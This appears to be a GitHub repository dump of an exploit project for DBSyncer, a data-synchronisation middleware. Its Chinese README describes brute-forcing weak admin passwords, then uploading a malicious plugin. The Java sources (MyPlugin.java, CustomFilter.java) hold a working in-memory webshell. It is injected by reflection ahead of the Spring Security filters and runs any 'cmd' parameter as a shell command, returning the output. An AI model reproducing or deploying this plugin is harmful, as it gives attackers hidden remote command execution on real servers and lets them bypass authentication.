├── .idea
    ├── .gitignore
    ├── artifacts
    │   └── test_plugin_jar.xml
    ├── compiler.xml
    ├── encodings.xml
    ├── jarRepositories.xml
    ├── libraries
    │   ├── dbsyncer_sdk_2_0_2_0528_RC__2_.xml
    │   ├── dbsyncer_sdk_2_0_2_0528_RC__3_.xml
    │   └── dbsyncer_sdk_2_0_2_0528_RC__4_.xml
    ├── misc.xml
    └── vcs.xml
├── README.md
├── img
    ├── img-rce.png
    └── img.png
├── lib
    └── dbsyncer-sdk-2.0.2_0528-RC.jar
├── out
    └── artifacts
    │   └── test_plugin_jar
    │       ├── dbsyncer-sdk-2.0.2_0528-RC.jar
    │       └── test-plugin.jar
├── pom.xml
├── src
    └── main
    │   ├── java
    │       └── org
    │       │   └── test
    │       │       ├── CustomFilter.java
    │       │       └── MyPlugin.java
    │   └── resources
    │       └── META-INF
    │           ├── MANIFEST.MF
    │           └── services
    │               └── org.dbsyncer.sdk.spi.PluginService
└── target
    └── classes
        ├── META-INF
            ├── MANIFEST.MF
            └── services
            │   └── org.dbsyncer.sdk.spi.PluginService
        └── org
            └── test
                ├── CustomFilter.class
                └── MyPlugin.class


/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | # 基于编辑器的 HTTP 客户端请求
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 | 


--------------------------------------------------------------------------------
/.idea/artifacts/test_plugin_jar.xml:
--------------------------------------------------------------------------------
 1 | <component name="ArtifactManager">
 2 |   <artifact name="test-plugin:jar">
 3 |     <output-path>$PROJECT_DIR$/out/artifacts/test_plugin_jar</output-path>
 4 |     <root id="root">
 5 |       <element id="archive" name="test-plugin.jar">
 6 |         <element id="module-output" name="dbsyncer-expolitplugin" />
 7 |         <element id="module-source" name="dbsyncer-expolitplugin" />
 8 |       </element>
 9 |       <element id="library" level="project" name="dbsyncer-sdk-2.0.2_0528-RC (2)" />
10 |     </root>
11 |   </artifact>
12 | </component>


--------------------------------------------------------------------------------
/.idea/compiler.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="CompilerConfiguration">
 4 |     <annotationProcessing>
 5 |       <profile name="Maven default annotation processors profile" enabled="true">
 6 |         <sourceOutputDir name="target/generated-sources/annotations" />
 7 |         <sourceTestOutputDir name="target/generated-test-sources/test-annotations" />
 8 |         <outputRelativeToContentRoot value="true" />
 9 |         <module name="dbsyncer-expolitplugin" />
10 |       </profile>
11 |     </annotationProcessing>
12 |   </component>
13 | </project>


--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="Encoding">
4 |     <file url="file://$PROJECT_DIR$/src/main/java" charset="UTF-8" />
5 |     <file url="file://$PROJECT_DIR$/src/main/resources" charset="UTF-8" />
6 |   </component>
7 | </project>


--------------------------------------------------------------------------------
/.idea/jarRepositories.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="RemoteRepositoriesConfiguration">
 4 |     <remote-repository>
 5 |       <option name="id" value="central" />
 6 |       <option name="name" value="Maven Central repository" />
 7 |       <option name="url" value="https://repo1.maven.org/maven2" />
 8 |     </remote-repository>
 9 |     <remote-repository>
10 |       <option name="id" value="central" />
11 |       <option name="name" value="Central Repository" />
12 |       <option name="url" value="http://maven.aliyun.com/nexus/content/groups/public" />
13 |     </remote-repository>
14 |     <remote-repository>
15 |       <option name="id" value="jboss.community" />
16 |       <option name="name" value="JBoss Community repository" />
17 |       <option name="url" value="https://repository.jboss.org/nexus/content/repositories/public/" />
18 |     </remote-repository>
19 |   </component>
20 | </project>


--------------------------------------------------------------------------------
/.idea/libraries/dbsyncer_sdk_2_0_2_0528_RC__2_.xml:
--------------------------------------------------------------------------------
1 | <component name="libraryTable">
2 |   <library name="dbsyncer-sdk-2.0.2_0528-RC (2)">
3 |     <CLASSES>
4 |       <root url="jar://$PROJECT_DIR$/lib/dbsyncer-sdk-2.0.2_0528-RC.jar!/" />
5 |     </CLASSES>
6 |     <JAVADOC />
7 |     <SOURCES />
8 |   </library>
9 | </component>


--------------------------------------------------------------------------------
/.idea/libraries/dbsyncer_sdk_2_0_2_0528_RC__3_.xml:
--------------------------------------------------------------------------------
1 | <component name="libraryTable">
2 |   <library name="dbsyncer-sdk-2.0.2_0528-RC (3)">
3 |     <CLASSES>
4 |       <root url="jar://$PROJECT_DIR$/lib/dbsyncer-sdk-2.0.2_0528-RC.jar!/" />
5 |     </CLASSES>
6 |     <JAVADOC />
7 |     <SOURCES />
8 |   </library>
9 | </component>


--------------------------------------------------------------------------------
/.idea/libraries/dbsyncer_sdk_2_0_2_0528_RC__4_.xml:
--------------------------------------------------------------------------------
1 | <component name="libraryTable">
2 |   <library name="dbsyncer-sdk-2.0.2_0528-RC (4)">
3 |     <CLASSES>
4 |       <root url="jar://$PROJECT_DIR$/lib/dbsyncer-sdk-2.0.2_0528-RC.jar!/" />
5 |     </CLASSES>
6 |     <JAVADOC />
7 |     <SOURCES />
8 |   </library>
9 | </component>


--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="ExternalStorageConfigurationManager" enabled="true" />
 4 |   <component name="MavenProjectsManager">
 5 |     <option name="originalFiles">
 6 |       <list>
 7 |         <option value="$PROJECT_DIR$/pom.xml" />
 8 |       </list>
 9 |     </option>
10 |   </component>
11 |   <component name="ProjectRootManager" version="2" languageLevel="JDK_1_8" default="true" project-jdk-name="1.8" project-jdk-type="JavaSDK">
12 |     <output url="file://$PROJECT_DIR$/out" />
13 |   </component>
14 | </project>


--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="VcsDirectoryMappings">
4 |     <mapping directory="$PROJECT_DIR$" vcs="Git" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ### （0day）DBSyncer后台自定义插件上传-注入内存马
 2 | > DBSyncer（简称dbs）是一款开源的数据同步中间件，提供MySQL、Oracle、SqlServer、PostgreSQL、Elasticsearch(ES)、Kafka、File、SQL等同步场景。支持上传插件自定义同步转换业务，提供监控全量和增量数据统计图、应用性能预警等。
 3 | https://github.com/86dbs/dbsyncer
 4 | ttps://gitee.com/ghi/dbsyncer
 5 | 
 6 | 0x01 弱口令爆破登录后台
 7 | 
 8 | 0x02 登录后台上传插件
 9 | ![img.png](img/img.png)
10 | 
11 | 0x03 注入内存马执行命令
12 | ```java
13 | http://localhost:18686/?cmd=whoami
14 | ```
15 | ![img.png](img/img-rce.png)
16 | 
17 | **感谢一起研究的师傅** :confetti_ball:
18 | 
19 | <table>
20 |     <tr>
21 |         <td align="center"><img alt="testnet0" src="https://avatars.githubusercontent.com/u/18673513?v=4" style="width: 100px;" /><br /><a href="https://github.com/testnet0">@testnet0</a></td>
22 |         <td align="center"><img alt="Nacl" src="https://avatars.githubusercontent.com/u/76427657?v=4" style="width: 100px;" /><br /><a href="https://github.com/Dr-dot-droid">@Nacl</a></td>
23 |     </tr>
24 | </table>
25 | 
26 | ---
27 | 


--------------------------------------------------------------------------------
/img/img-rce.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tangxiaofeng7/dbsyncer-expolitplugin/157f964f1921e9a03e846dc56f267870739bd7a9/img/img-rce.png


--------------------------------------------------------------------------------
/img/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tangxiaofeng7/dbsyncer-expolitplugin/157f964f1921e9a03e846dc56f267870739bd7a9/img/img.png


--------------------------------------------------------------------------------
/lib/dbsyncer-sdk-2.0.2_0528-RC.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tangxiaofeng7/dbsyncer-expolitplugin/157f964f1921e9a03e846dc56f267870739bd7a9/lib/dbsyncer-sdk-2.0.2_0528-RC.jar


--------------------------------------------------------------------------------
/out/artifacts/test_plugin_jar/dbsyncer-sdk-2.0.2_0528-RC.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tangxiaofeng7/dbsyncer-expolitplugin/157f964f1921e9a03e846dc56f267870739bd7a9/out/artifacts/test_plugin_jar/dbsyncer-sdk-2.0.2_0528-RC.jar


--------------------------------------------------------------------------------
/out/artifacts/test_plugin_jar/test-plugin.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tangxiaofeng7/dbsyncer-expolitplugin/157f964f1921e9a03e846dc56f267870739bd7a9/out/artifacts/test_plugin_jar/test-plugin.jar


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>cn.txf7</groupId>
 8 |     <artifactId>dbsyncer-expolitplugin</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <dependencies>
12 |         <dependency>
13 |             <groupId>org.springframework.boot</groupId>
14 |             <artifactId>spring-boot-starter-web</artifactId>
15 |             <version>1.5.10.RELEASE</version>
16 |         </dependency>
17 |         <dependency>
18 |             <groupId>org.springframework.boot</groupId>
19 |             <artifactId>spring-boot-starter-security</artifactId>
20 |             <version>1.5.10.RELEASE</version>
21 |         </dependency>
22 |     </dependencies>
23 |     <properties>
24 |         <maven.compiler.source>8</maven.compiler.source>
25 |         <maven.compiler.target>8</maven.compiler.target>
26 |         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
27 |     </properties>
28 | 
29 | </project>


--------------------------------------------------------------------------------
/src/main/java/org/test/CustomFilter.java:
--------------------------------------------------------------------------------
 1 | package org.test;
 2 | 
 3 | 
 4 | import org.springframework.security.web.FilterChainProxy;
 5 | import org.springframework.security.web.SecurityFilterChain;
 6 | import org.springframework.web.context.WebApplicationContext;
 7 | 
 8 | import javax.servlet.*;
 9 | import java.io.BufferedReader;
10 | import java.io.IOException;
11 | import java.io.InputStreamReader;
12 | import java.lang.reflect.Field;
13 | import java.util.List;
14 | 
15 | public class CustomFilter implements Filter {
16 | 
17 |     @Override
18 |     public void init(FilterConfig filterConfig) throws ServletException {
19 | 
20 |     }
21 | 
22 |     @Override
23 |     public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
24 |         System.out.println("CustomFilter is called before security filters");
25 |         if (request.getParameter("cmd") != null) {
26 |             try {
27 |                 boolean isLinux = true;
28 |                 String osTyp = System.getProperty("os.name");
29 |                 if (osTyp != null && osTyp.toLowerCase().contains("win")) {
30 |                     isLinux = false;
31 |                 }
32 |                 String[] cmds = isLinux ? new String[]{"/bin/bash", "-c", "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin && " + request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")};
33 |                 Process process = Runtime.getRuntime().exec(cmds);
34 |                 StringBuilder output = new StringBuilder();
35 |                 // 读取标准输出流
36 |                 BufferedReader stdInput = new BufferedReader(new InputStreamReader(process.getInputStream()));
37 |                 String s = null;
38 |                 while ((s = stdInput.readLine()) != null) {
39 |                     output.append(s).append("\n");
40 |                 }
41 | 
42 |                 // 读取标准错误流
43 |                 BufferedReader stdError = new BufferedReader(new InputStreamReader(process.getErrorStream()));
44 |                 while ((s = stdError.readLine()) != null) {
45 |                     output.append(s).append("\n");
46 |                 }
47 | 
48 |                 // 等待命令执行完成
49 |                 int exitVal = process.waitFor();
50 |                 if (exitVal == 0) {
51 |                     System.out.println("Command executed successfully.");
52 |                 } else {
53 |                     System.out.println("Command execution failed with exit value: " + exitVal);
54 |                 }
55 | 
56 |                 System.out.println("Output:\n" + output.toString());
57 |                 response.getWriter().println(output);
58 |                 System.out.println(output);
59 |                 response.getWriter().flush();
60 |                 response.getWriter().close();
61 |             } catch (Exception e) {
62 |                 e.printStackTrace();
63 |             }
64 |         }
65 |         chain.doFilter(request, response);
66 |     }
67 | 
68 | 
69 |     @Override
70 |     public void destroy() {
71 |         // 销毁逻辑
72 |     }
73 | 
74 |     // 通过反射插入自定义过滤器
75 |     public static void addCustomFilter(WebApplicationContext context) {
76 |         try {
77 |             // 获取 FilterChainProxy 实例
78 |             FilterChainProxy filterChainProxy = context.getBean(FilterChainProxy.class);
79 |             Field field = FilterChainProxy.class.getDeclaredField("filterChains");
80 |             field.setAccessible(true);
81 | 
82 |             // 获取 filterChains
83 |             List<SecurityFilterChain> filterChains = (List<SecurityFilterChain>) field.get(filterChainProxy);
84 | 
85 |             // 插入自定义过滤器
86 |             for (SecurityFilterChain chain : filterChains) {
87 |                 List<Filter> filters = chain.getFilters();
88 |                 filters.add(0, new CustomFilter()); // 插入到过滤器链的最前面
89 |             }
90 |         } catch (Exception e) {
91 |             e.printStackTrace();
92 |         }
93 |     }
94 | }
95 | 


--------------------------------------------------------------------------------
/src/main/java/org/test/MyPlugin.java:
--------------------------------------------------------------------------------
 1 | package org.test;
 2 | 
 3 | import org.dbsyncer.sdk.plugin.PluginContext;
 4 | import org.dbsyncer.sdk.spi.PluginService;
 5 | import javax.annotation.PostConstruct;
 6 | import org.springframework.web.context.WebApplicationContext;
 7 | import org.springframework.web.context.request.RequestContextHolder;
 8 | public class MyPlugin implements PluginService {
 9 | 
10 |     private WebApplicationContext context;
11 | 
12 |     @PostConstruct
13 |     public void init() {
14 |         try {
15 |             context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
16 |             CustomFilter.addCustomFilter(context); // 调用反射插入过滤器
17 |         } catch (Exception e) {
18 |             throw new RuntimeException(e);
19 |         }
20 |     }
21 | 
22 |     @Override
23 |     public void convert(PluginContext pluginContext) {
24 |     }
25 | 
26 |     @Override
27 |     public void postProcessAfter(PluginContext context) {
28 |     }
29 | 
30 |     @Override
31 |     public String getVersion() {
32 |         return "1.0.0";
33 |     }
34 | 
35 |     @Override
36 |     public String getName() {
37 |         return "内存马插件";
38 |     }
39 | }


--------------------------------------------------------------------------------
/src/main/resources/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: 
3 | Class-Path: dbsyncer-sdk-2.0.2_0528-RC.jar
4 | 
5 | 


--------------------------------------------------------------------------------
/src/main/resources/META-INF/services/org.dbsyncer.sdk.spi.PluginService:
--------------------------------------------------------------------------------
1 | org.test.MyPlugin


--------------------------------------------------------------------------------
/target/classes/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: 
3 | Class-Path: dbsyncer-sdk-2.0.2_0528-RC.jar
4 | 
5 | 


--------------------------------------------------------------------------------
/target/classes/META-INF/services/org.dbsyncer.sdk.spi.PluginService:
--------------------------------------------------------------------------------
1 | org.test.MyPlugin


--------------------------------------------------------------------------------
/target/classes/org/test/CustomFilter.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tangxiaofeng7/dbsyncer-expolitplugin/157f964f1921e9a03e846dc56f267870739bd7a9/target/classes/org/test/CustomFilter.class


--------------------------------------------------------------------------------
/target/classes/org/test/MyPlugin.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tangxiaofeng7/dbsyncer-expolitplugin/157f964f1921e9a03e846dc56f267870739bd7a9/target/classes/org/test/MyPlugin.class


--------------------------------------------------------------------------------